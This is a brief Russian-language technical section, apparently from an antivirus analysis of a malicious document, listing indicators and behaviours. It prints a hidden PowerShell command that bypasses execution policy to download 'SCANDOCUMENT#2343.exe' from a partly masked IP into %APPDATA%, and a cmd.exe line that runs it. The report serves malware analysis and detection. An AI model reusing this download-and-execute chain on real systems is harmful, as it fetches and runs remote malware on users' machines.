Техническая информация
- http://84.##.132.112/scandocument#2343.exe как %appdata%\scandocument#2343
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\SCANDOCUMENT#2343
- %TEMP%\sbdtfhgygeghdpœ.sct
- %TEMP%\sbdtfhgygeghdpœ.sct
- '84.##.132.112':80
- http://84.##.132.112/SCANDOCUMENT%232343.exe
- http://84.##.132.112/SCANDOCUMENT
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://84.##.132.112/SCANDOCUMENT#2343.exe','%APPDATA%\SCANDOCUMENT#2343')' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\SCANDOCUMENT#2343' (со скрытым окном)